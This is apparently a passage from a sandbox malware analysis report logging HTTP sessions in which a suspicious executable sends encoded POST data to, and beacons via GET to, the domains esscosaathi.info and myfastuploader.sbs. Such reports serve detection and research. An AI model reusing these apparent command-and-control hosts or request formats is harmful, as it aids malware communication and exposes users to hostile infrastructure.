                                                                            Data Raw: 69 64 54 44 65 76 36 50 3d 76 2b 49 33 42 35 6e 6f 30 31 4b 30 6a 48 74 5a 6e 56 44 74 45 35 4a 50 6d 62 48 52 39 2f 37 54 52 56 45 37 74 41 38 30 65 38 4e 41 39 37 62 78 33 32 6f 58 56 39 53 44 2b 47 56 4d 5a 46 4a 63 71 4b 55 68 78 35 71 54 58 36 68 42 37 2b 57 56 6f 49 65 44 50 66 72 45 71 6c 55 79 52 57 63 6b 6a 46 53 63 54 6a 36 57 6c 4b 68 65 6c 73 4f 34 50 6e 59 67 36 55 4f 73 64 47 71 33 74 54 5a 73 75 70 6a 77 63 6c 74 6f 51 6f 6b 6b 55 30 77 59 77 33 32 68 6e 2f 48 30 59 4d 61 43 2b 4b 59 63 79 4f 4b 6f 53 78 52 38 53 50 76 76 72 42 31 36 57 70 43 2b 70 53 39 70 61 4e 54 77 2b 4f 67 6a 6d 52 38 4c 47 5a 48 57 44 54 58 7a 33 64 36 45 76 74 6f 35 33 69 49 3d
                                                                            Data Ascii: idTDev6P=v+I3B5no01K0jHtZnVDtE5JPmbHR9/7TRVE7tA80e8NA97bx32oXV9SD+GVMZFJcqKUhx5qTX6hB7+WVoIeDPfrEqlUyRWckjFScTj6WlKhelsO4PnYg6UOsdGq3tTZsupjwcltoQokkU0wYw32hn/H0YMaC+KYcyOKoSxR8SPvvrB16WpC+pS9paNTw+OgjmR8LGZHWDTXz3d6Evto53iI=
                                                                            Jan 13, 2025 10:20:11.527442932 CET73INHTTP/1.1 405 Method Not Allowed
                                                                            content-length: 0
                                                                            connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.2.44989615.197.240.20802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:20:13.607990026 CET10846OUTPOST /u8xw/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.esscosaathi.info
                                                                            Origin: http://www.esscosaathi.info
                                                                            Referer: http://www.esscosaathi.info/u8xw/
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Content-Length: 10305
                                                                            Cache-Control: no-cache
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Data Raw: 69 64 54 44 65 76 36 50 3d 76 2b 49 33 42 35 6e 6f 30 31 4b 30 6a 48 74 5a 6e 56 44 74 45 35 4a 50 6d 62 48 52 39 2f 37 54 52 56 45 37 74 41 38 30 65 38 46 41 68 59 54 78 34 78 38 58 55 39 53 44 33 6d 56 4a 5a 46 4a 37 71 4b 4e 71 78 35 6e 6b 58 38 6c 42 36 64 75 56 74 35 65 44 46 66 72 45 6c 46 55 6d 56 57 64 2b 6a 47 72 58 54 6a 71 57 6c 4b 68 65 6c 76 6d 34 4d 7a 30 67 32 30 4f 7a 4c 32 71 7a 70 54 59 35 75 70 72 4b 63 6c 68 65 51 35 45 6b 55 55 67 59 33 45 4f 68 6c 66 48 32 57 73 61 61 2b 4b 63 48 79 4b 72 58 53 78 6c 53 53 4e 7a 76 70 56 73 4e 42 49 62 6d 7a 43 77 7a 45 4f 76 7a 32 2b 38 79 68 79 49 41 57 70 37 52 64 79 65 45 34 37 37 36 32 39 34 44 6d 6e 43 50 79 70 44 46 4d 6c 43 30 55 6c 31 6d 6c 64 7a 31 69 48 45 65 38 2f 54 57 69 76 34 6f 4e 32 4d 36 76 56 52 54 4c 50 34 49 69 65 6c 62 76 59 46 41 4e 38 78 51 67 78 4e 61 74 61 77 68 48 68 69 56 74 68 68 65 35 77 36 31 6e 57 53 46 30 37 30 78 7a 59 56 33 62 4f 47 49 4d 57 4c 46 74 54 4e 67 75 34 6f 66 65 72 55 6d 33 66 4e 54 35 79 6d 50 61 [TRUNCATED]
                                                                            Data Ascii: idTDev6P=v+I3B5no01K0jHtZnVDtE5JPmbHR9/7TRVE7tA80e8FAhYTx4x8XU9SD3mVJZFJ7qKNqx5nkX8lB6duVt5eDFfrElFUmVWd+jGrXTjqWlKhelvm4Mz0g20OzL2qzpTY5uprKclheQ5EkUUgY3EOhlfH2Wsaa+KcHyKrXSxlSSNzvpVsNBIbmzCwzEOvz2+8yhyIAWp7RdyeE4776294DmnCPypDFMlC0Ul1mldz1iHEe8/TWiv4oN2M6vVRTLP4IielbvYFAN8xQgxNatawhHhiVthhe5w61nWSF070xzYV3bOGIMWLFtTNgu4oferUm3fNT5ymPaIEJt8k5w6bsyU26076NlWcKowfdERsj4pemWuKlxtBMCmeSDiQ1Xn2JSfElx5KJCEf2Xx4uvtAhybcHBOKiLD9P5bgsiPu9HYor/pTb03H/aAEZ8nGLasXhPMtK6VEVpt0utx0zo+wg9UrFl5RqyqnDYo1Vow+gAc9cQUygpkQGu4+QDJFBAAfSfV5n5YNGblthpYLBRVETB30AVN/bq7DsnBMpCLUJWWJJGOI+9wwEQqxRqfyGe/N/UIJDysdFX4yRR8ee+guGN0gm/VredqdaHFptDMt4pDXH3ZjEbsY2iXTg5rVfiaoK/0JYC14EpSFrHTdWLEDSugLOtrN9WJmkX/FyzlIXcVn+2DJrPGSmhqvaYJ/ns3peGBU3SxzJW5TVccO3WVBt6WiUCCwpaZnIgl10TzhhBDbpHwP01Eax9C9Ag63j9Yfq+bjWvzZyuGU6ocG9yUc25pxgB5psBprJUFEXUsztpHR7TToweK3ssIhn1a1+WETAAQmuCfZoK6DgzKNDYNLMHNoFE4aj1rX4YVsOLXU2ZLFNYFVL83/WJ8iwi/3tg01pvZ6NqAqA9wuJtnjduvL6J69RbkLm8A+HNadr4gQElxzI7NotDhcBTDRCKH2ga5h/UDy0pywHPX9SKQVbYqqo55X2aBqwz0dabAfReMbHD9e [TRUNCATED]


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            8192.168.2.44991615.197.240.20802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:20:16.148545027 CET470OUTGET /u8xw/?z2=LHT8eHbp3J&idTDev6P=i8gXCJLEz0m1jkVC3VXAcNUKqrLt4taQegcb3nUsXOZ4n5/i1i4bc9in+BhRQDpL1rpCirHyU+hVzoSxv42EL87/iV5cEHcZkG+VUFy3lql/kPGuEhgf21E= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.esscosaathi.info
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Jan 13, 2025 10:20:17.600891113 CET379INHTTP/1.1 200 OK
                                                                            content-type: text/html
                                                                            date: Mon, 13 Jan 2025 09:20:17 GMT
                                                                            content-length: 258
                                                                            connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 7a 32 3d 4c 48 54 38 65 48 62 70 33 4a 26 69 64 54 44 65 76 36 50 3d 69 38 67 58 43 4a 4c 45 7a 30 6d 31 6a 6b 56 43 33 56 58 41 63 4e 55 4b 71 72 4c 74 34 74 61 51 65 67 63 62 33 6e 55 73 58 4f 5a 34 6e 35 2f 69 31 69 34 62 63 39 69 6e 2b 42 68 52 51 44 70 4c 31 72 70 43 69 72 48 79 55 2b 68 56 7a 6f 53 78 76 34 32 45 4c 38 37 2f 69 56 35 63 45 48 63 5a 6b 47 2b 56 55 46 79 33 6c 71 6c 2f 6b 50 47 75 45 68 67 66 32 31 45 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?z2=LHT8eHbp3J&idTDev6P=i8gXCJLEz0m1jkVC3VXAcNUKqrLt4taQegcb3nUsXOZ4n5/i1i4bc9in+BhRQDpL1rpCirHyU+hVzoSxv42EL87/iV5cEHcZkG+VUFy3lql/kPGuEhgf21E="}</script></head></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            9192.168.2.449957136.243.225.5802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:20:22.697398901 CET750OUTPOST /y3ui/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.myfastuploader.sbs
                                                                            Origin: http://www.myfastuploader.sbs
                                                                            Referer: http://www.myfastuploader.sbs/y3ui/
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Content-Length: 205
                                                                            Cache-Control: no-cache
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Data Raw: 69 64 54 44 65 76 36 50 3d 4f 36 54 6c 2b 78 6d 58 52 37 6a 55 78 55 61 50 50 48 57 49 36 32 35 78 51 61 56 53 6c 30 6b 6a 45 43 6b 78 43 6b 73 47 4f 32 50 6d 52 69 4b 44 47 75 54 2f 64 44 74 78 49 4b 2f 55 75 45 67 47 42 33 48 73 50 5a 6c 56 47 6d 77 37 44 79 4c 6b 71 56 31 6c 73 56 75 51 41 54 6f 72 34 6e 57 6c 55 43 53 7a 41 4f 53 59 5a 67 68 35 61 44 4f 31 53 35 75 55 4a 53 67 68 65 39 53 77 6d 5a 70 77 36 33 42 61 4b 6b 4f 68 35 57 77 4e 7a 46 4d 76 6f 71 56 4f 37 62 78 4d 2b 47 35 35 68 35 45 6f 43 32 30 65 74 59 71 38 6f 73 56 76 68 6d 41 4c 66 6a 4c 48 6b 6c 62 6d 55 30 34 6f 47 44 69 5a 48 67 3d 3d
                                                                            Data Ascii: idTDev6P=O6Tl+xmXR7jUxUaPPHWI625xQaVSl0kjECkxCksGO2PmRiKDGuT/dDtxIK/UuEgGB3HsPZlVGmw7DyLkqV1lsVuQATor4nWlUCSzAOSYZgh5aDO1S5uUJSghe9SwmZpw63BaKkOh5WwNzFMvoqVO7bxM+G55h5EoC20etYq8osVvhmALfjLHklbmU04oGDiZHg==
                                                                            Jan 13, 2025 10:20:23.330616951 CET891INHTTP/1.1 301 Moved Permanently
                                                                            Connection: close
                                                                            content-type: text/html
                                                                            content-length: 707
                                                                            date: Mon, 13 Jan 2025 09:20:19 GMT
                                                                            location: https://www.myfastuploader.sbs/y3ui/
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            10192.168.2.449977136.243.225.5802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:20:25.251497030 CET770OUTPOST /y3ui/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.myfastuploader.sbs
                                                                            Origin: http://www.myfastuploader.sbs
                                                                            Referer: http://www.myfastuploader.sbs/y3ui/
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Content-Length: 225
                                                                            Cache-Control: no-cache
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Data Raw: 69 64 54 44 65 76 36 50 3d 4f 36 54 6c 2b 78 6d 58 52 37 6a 55 7a 32 4f 50 44 41 4b 49 79 32 35 79 56 61 56 53 75 55 6b 76 45 43 6f 78 43 6c 35 4e 4f 6a 2f 6d 52 48 75 44 46 72 2f 2f 59 44 74 78 44 71 2f 72 67 6b 68 4b 42 33 37 4f 50 59 70 56 47 6d 6b 37 44 7a 37 6b 71 69 4a 6b 76 6c 75 53 5a 6a 6f 70 33 48 57 6c 55 43 53 7a 41 4f 47 32 5a 6a 52 35 61 79 2b 31 54 63 53 62 44 79 67 69 49 74 53 77 69 5a 70 73 36 33 42 38 4b 6d 37 47 35 55 59 4e 7a 46 38 76 6f 2f 70 50 78 62 78 4f 36 47 34 4b 68 4a 35 45 41 48 39 66 74 6f 6d 4d 67 63 64 44 67 67 4e 52 4f 53 71 51 32 6c 2f 56 4a 7a 78 63 4c 41 66 51 63 69 53 55 65 36 46 58 6d 58 34 39 42 65 53 6b 71 6e 34 56 61 64 6f 3d
                                                                            Data Ascii: idTDev6P=O6Tl+xmXR7jUz2OPDAKIy25yVaVSuUkvECoxCl5NOj/mRHuDFr//YDtxDq/rgkhKB37OPYpVGmk7Dz7kqiJkvluSZjop3HWlUCSzAOG2ZjR5ay+1TcSbDygiItSwiZps63B8Km7G5UYNzF8vo/pPxbxO6G4KhJ5EAH9ftomMgcdDggNROSqQ2l/VJzxcLAfQciSUe6FXmX49BeSkqn4Vado=
                                                                            Jan 13, 2025 10:20:25.887921095 CET891INHTTP/1.1 301 Moved Permanently
                                                                            Connection: close
                                                                            content-type: text/html
                                                                            content-length: 707
                                                                            date: Mon, 13 Jan 2025 09:20:22 GMT
                                                                            location: https://www.myfastuploader.sbs/y3ui/
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            11192.168.2.449994136.243.225.5802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:20:28.110378981 CET10852OUTPOST /y3ui/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.myfastuploader.sbs
                                                                            Origin: http://www.myfastuploader.sbs
                                                                            Referer: http://www.myfastuploader.sbs/y3ui/
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Content-Length: 10305
                                                                            Cache-Control: no-cache
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Data Raw: 69 64 54 44 65 76 36 50 3d 4f 36 54 6c 2b 78 6d 58 52 37 6a 55 7a 32 4f 50 44 41 4b 49 79 32 35 79 56 61 56 53 75 55 6b 76 45 43 6f 78 43 6c 35 4e 4f 6a 33 6d 52 56 6d 44 46 49 48 2f 66 44 74 78 4f 4b 2f 51 67 6b 67 51 42 33 54 4b 50 59 55 69 47 6b 63 37 44 56 76 6b 6a 7a 4a 6b 34 31 75 53 52 44 6f 73 34 6e 57 4b 55 43 44 36 41 4f 57 32 5a 6a 52 35 61 77 32 31 54 4a 75 62 46 79 67 68 65 39 53 38 6d 5a 70 49 36 33 6f 48 4b 6d 75 78 35 6b 34 4e 71 6c 73 76 71 4e 42 50 33 4c 78 41 32 6d 34 53 68 4a 31 62 41 44 56 70 74 72 36 31 67 65 42 44 6a 48 68 48 62 42 75 5a 70 56 54 38 51 55 42 39 4b 77 44 42 48 6a 4f 70 51 76 4d 50 78 45 67 41 5a 66 7a 33 2b 6d 73 6c 4f 64 73 33 48 46 70 4a 5a 78 59 61 43 32 50 71 30 2b 71 57 51 64 45 2b 34 43 38 67 6e 57 2b 6d 57 2f 75 4c 4d 58 71 49 44 49 78 74 35 42 53 6c 31 59 75 39 59 49 41 66 64 30 6b 30 42 44 64 59 70 41 41 63 4d 6b 51 31 74 39 50 75 39 71 65 50 47 53 58 6a 74 6e 6c 53 69 37 53 4a 33 50 6b 43 58 50 48 74 52 48 6b 37 72 39 56 4b 35 6b 70 6e 39 36 71 46 56 [TRUNCATED]
                                                                            Data Ascii: idTDev6P=O6Tl+xmXR7jUz2OPDAKIy25yVaVSuUkvECoxCl5NOj3mRVmDFIH/fDtxOK/QgkgQB3TKPYUiGkc7DVvkjzJk41uSRDos4nWKUCD6AOW2ZjR5aw21TJubFyghe9S8mZpI63oHKmux5k4NqlsvqNBP3LxA2m4ShJ1bADVptr61geBDjHhHbBuZpVT8QUB9KwDBHjOpQvMPxEgAZfz3+mslOds3HFpJZxYaC2Pq0+qWQdE+4C8gnW+mW/uLMXqIDIxt5BSl1Yu9YIAfd0k0BDdYpAAcMkQ1t9Pu9qePGSXjtnlSi7SJ3PkCXPHtRHk7r9VK5kpn96qFVvOl7nFJgs6rXOIp4d9mFo2JzhptT9cqnN7zVsHPeVlcwUGt7c9+S4LLkT/eiio4DL4LAo6hdwUhuSKQSEN2/tAUNklgKemGzjAMFIOH4FTEKsj/qLBnxx7oSYu4s21m3nG+EUVniZ7+6b8JD9r0PQahccixS+5Oyyo+Rs3nI8pKu0vMY01/k+bZQLOUN1dRVQREz1DaJEZjSU+k7QdtNduaNvGgFIknTowxk4ZlXpfDAO4OIBItovMDlOJeTgqtFkJgtChFWJ9D5vqyKt3sZZZUJOtHOrtfo5tI08DUiPC1YfIpSpjsQvTpdb15kESmMpmnzxDfjevHMa9FfP3mUu87ghUXsmEoaxJ8DDCZsIwTFcVObDYgQncBiojuYao4M1qoDqBymNSNDPMKptQ8FcnKYtqSRZCP2lTHMtIFR3iFUcsEsSY1BI2d28P80wMpTx8aZYqhuMpsXKPl1xY/KrGswUEUgnU7rGtboCdXh5WowNRg2UZ89zGl1XZEWsEoN5ccrDtN9lNJ+xoAMj8Zj9GLQrfLgKdlb2iBNQaqxJl7DEqlaDikgd9/LUZ7obJBV5/j2QZJZreEF1SoHpOZWxFaFu4QNRCXDz1ZJJrz6XaPe/et9o5FgUSnjroJhxYMsPvPmEQwpVLJlB+brDaQ7Ziej66kitNYPJ2 [TRUNCATED]
                                                                            Jan 13, 2025 10:20:28.783087015 CET891INHTTP/1.1 301 Moved Permanently
                                                                            Connection: close
                                                                            content-type: text/html
                                                                            content-length: 707
                                                                            date: Mon, 13 Jan 2025 09:20:25 GMT
                                                                            location: https://www.myfastuploader.sbs/y3ui/
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            12192.168.2.450010136.243.225.5802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:20:30.654356956 CET472OUTGET /y3ui/?idTDev6P=D47F9HanQoviz063Kla+uXJoUZ9Xkn5EFykOP0gieBCBMXnJAqL7dT9IMNT9u2QvL1nqZZA8LUwsGl6iuyQexR6UeFArqVG6bzfyBJ63IAhlWCOyYqCEOzA=&z2=LHT8eHbp3J HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.myfastuploader.sbs
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Jan 13, 2025 10:20:31.291377068 CET1035INHTTP/1.1 301 Moved Permanently
                                                                            Connection: close
                                                                            content-type: text/html
                                                                            content-length: 707
                                                                            date: Mon, 13 Jan 2025 09:20:27 GMT
                                                                            location: https://www.myfastuploader.sbs/y3ui/?idTDev6P=D47F9HanQoviz063Kla+uXJoUZ9Xkn5EFykOP0gieBCBMXnJAqL7dT9IMNT9u2QvL1nqZZA8LUwsGl6iuyQexR6UeFArqVG6bzfyBJ63IAhlWCOyYqCEOzA=&z2=LHT8eHbp3J
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
